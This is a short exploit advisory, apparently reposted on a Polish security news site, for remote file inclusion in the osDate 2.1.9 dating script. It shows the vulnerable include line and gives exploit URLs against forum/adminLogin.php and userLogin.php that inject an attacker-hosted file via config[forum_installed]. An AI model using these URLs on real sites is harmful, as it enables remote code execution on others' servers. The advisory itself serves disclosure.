osDate remote file inclusion

Tekst :

===========================================================================
=============

[o] osDate Remote File Inclusion Vulnerabilities

Software : osDate dating and matchmaking script version 2.1.9
[mostly affected]
Vendor : http://www.tufat.com/
Download : http://www.tufat.com/s_free_dating_system.htm
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

===========================================================================
=============

[o] Vulnerable file

include_once($config['forum_installed'] . "_forum.php");

forum/adminLogin.php
forum/userLogin.php

[o] Exploit

http://localhost/[path]/forum/adminLogin.php?config[forum_installed]=[evilc
0de]

http://localhost/[path]/forum/userLogin.php?config[forum_installed]=[evilc0
de]

[o] Dork

cari ndiri yee.. gampang koq dork na.. :p

===========================================================================
=============

[o] Greetz

Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella
H312Y yooogy mousekill }^-^{ noname s4va stardustmemory
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

===========================================================================
=============

Bezpieczeństwo informacji

Wiadomości IT

Dodaj wiadomość

Szukaj

Baza SecurityAlert

O SecurityAlert

Baza ExploitAlert

Badania SecurityReason

Baza WLB

Dodaj Note WLB

O WLB

Informacje

Harmonogram

Cena

Referencje

Kontakt

Wiadomości

SecurityAlert

ExploitAlert

Apache

PHP

WLB

Kontakt

Informacje o firmie

Apache HTTP Server Denial
of Service Vulnerability

Multiple Vendors
libc/fnmatch(3) DoS (incl
apache poc)

Apache Continuum
cross-site scripting
vulnerability

Apache Tomcat DoS
Vulnerability

PHP Hashtables Denial of
Service

PHP 5.3.6 multiple null
pointer dereference

PHP 5.3.6 ZipArchive
invalid use glob(3)

libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)